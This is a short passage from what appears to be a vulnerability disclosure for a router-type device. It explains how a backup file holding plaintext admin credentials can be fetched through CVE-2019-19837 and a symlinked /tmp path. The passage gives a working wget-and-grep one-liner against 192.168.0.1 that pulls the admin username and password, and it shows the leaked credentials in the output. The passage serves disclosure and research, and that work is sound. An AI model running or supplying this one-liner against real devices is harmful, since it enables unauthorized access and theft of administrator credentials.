The above shows a symbolic link from
rpmd executable writes a backup file named
/var/run/rpmkey with a new revision number.
/var/run is also symbolically linked to
/tmp/, hence one can fetch this file as well.
rpmkey contained the admin credentails plaintext in this following fields:
This file is fetchable due to CVE-2019-19837
Admin credentials leakage one-liner:
➜ demo num=$(wget -q -O - 192.168.0.1/user/wps_tool_cache/var/run/rpmkey.rev);\ wget -q -O - 192.168.0.1/user/wps_tool_cache/var/run/rpmkey$num|\ strings|grep -A 1 all_powerful_login all_powerful_login_name admin all_powerful_login_password mooncake